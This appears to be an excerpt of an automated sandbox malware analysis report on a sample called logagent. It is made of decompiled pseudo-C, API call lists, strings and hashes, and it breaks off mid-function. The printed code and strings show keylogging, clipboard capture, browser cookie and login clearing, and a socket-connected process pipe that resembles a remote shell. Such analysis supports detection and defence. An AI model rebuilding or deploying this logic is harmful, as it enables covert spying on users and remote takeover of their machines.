                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [INFO], xrefs: 004079A1
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407B8C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				char* _t29;
				void* _t38;
				intOrPtr _t49;
				void* _t50;
				void* _t53;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t49 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t53 = _t50 + 0x24;
				_t19 = _t49 - 0x42;
				if(_t19 == 0) {
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t21 = E00406DD9(_t20);
					__eflags = _t21;
					_pop(_t38);
					if(_t21 != 0) {
						_t24 = E00407033(_t21, "FunFunc");
						_push(_t38);
						 *0x41ba18 = _t24;
						 *0x41ba1c = 1;
						E00412855(_t38, _t53, 0x41bcf8);
						E004020C2(_a4, 0x6d, _t38);
					}
				} else {
					_t56 = _t19 == 1;
					if(_t19 == 1) {
						_t29 = E0040180C( &_v20, _t56, 0);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x41ba18(atoi(_t29));
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}














                                  0x00407b96
                                  0x00407b9c
                                  0x00407bae
                                  0x00407bbe
                                  0x00407bcd
                                  0x00407bd7
                                  0x00407bde
                                  0x00407be1
                                  0x00407be4
                                  0x00407c12
                                  0x00407c19
                                  0x00407c20
                                  0x00407c25
                                  0x00407c27
                                  0x00407c28
                                  0x00407c30
                                  0x00407c35
                                  0x00407c37
                                  0x00407c44
                                  0x00407c4b
                                  0x00407c57
                                  0x00407c57
                                  0x00407be6
                                  0x00407be6
                                  0x00407be7
                                  0x00407bee
                                  0x00407bf5
                                  0x00407c03
                                  0x00407c0a
                                  0x00407be7
                                  0x00407c5f
                                  0x00407c67
                                  0x00407c70
                                  0x00407c7a

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00407BAE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                  • atoi.MSVCRT ref: 00407BFC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                  • String ID: FunFunc
                                  • API String ID: 2980839617-81400306
                                  • Opcode ID: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                  • Opcode Fuzzy Hash: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0);
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0);
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                  0x00405185
                                  0x00405190
                                  0x00405194
                                  0x0040519c
                                  0x004051a8
                                  0x004051ad
                                  0x004051af
                                  0x004051b9
                                  0x004051c1
                                  0x004051c1
                                  0x004051d0
                                  0x004051e4
                                  0x004051ea
                                  0x00405204
                                  0x00405208
                                  0x00405214
                                  0x00405214
                                  0x00405220
                                  0x00405225
                                  0x0040522f

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,761B43E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32 ref: 00405204
                                  • CreateThread.KERNEL32 ref: 00405214
                                  • CreateThread.KERNEL32 ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C35 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                  0x00406c45
                                  0x00406c4c
                                  0x00406c4e
                                  0x00406c5b
                                  0x00406c66
                                  0x00406c6b
                                  0x00406c72
                                  0x00406c7c
                                  0x00406c81
                                  0x00406c8b
                                  0x00406c93
                                  0x00406c99
                                  0x00406ca2
                                  0x00406cac
                                  0x00406cc4
                                  0x00406cce
                                  0x00406cd8
                                  0x00406ce0
                                  0x00406ce0
                                  0x00406cac
                                  0x00406ce9
                                  0x00406cf3

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411A24 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10544519 Relevance: 16.8, APIs: 11, Instructions: 291sleepfileprocessCOMMON
                                  Download Yara Rule
                                  APIs
                                  • getenv.MSVCRT ref: 105445C3
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 1054469D
                                    • Part of subcall function 10543A2A: connect.WS2_32(0041B240,0041B244,00000010), ref: 10543A40
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 10544700
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10544726
                                  • malloc.MSVCRT ref: 10544738
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 10544750
                                  • _strncoll.MSVCRT ref: 10544772
                                  • ??3@YAXPAX@Z.MSVCRT ref: 105447FD
                                  • WriteFile.KERNEL32(00000000), ref: 1054487C
                                  • Sleep.KERNEL32(00000064), ref: 10544896
                                  • TerminateProcess.KERNEL32(00000000), ref: 105448B0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileProcessSleep$??3@CreateNamedPeekPipeReadTerminateWrite_strncollconnectgetenvmalloc
                                  • String ID:
                                  • API String ID: 1953786159-0
                                  • Opcode ID: c437fb62b551716d388a015297db68c5a4a1296deaa3bf92615400c475bd4ade
                                  • Instruction ID: 2404f9a4c146d33880c6c182ce8773e55026f3b9b3c73d851c6a5d0db2ceb2c9
                                  • Opcode Fuzzy Hash: c437fb62b551716d388a015297db68c5a4a1296deaa3bf92615400c475bd4ade
                                  • Instruction Fuzzy Hash: 54B1B431A40609EFDB01ABA1DC4DAEE7FB9EB85B50F10803AF811D61A0DBB45945CFD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10555933 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E10555933(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				void* _t55;
				intOrPtr _t57;

				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				 *0x415364(2, __edi, __esi, __ebx,  *[fs:0x0], 0x414130, 0x416e50, 0xffffffff, _t55);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
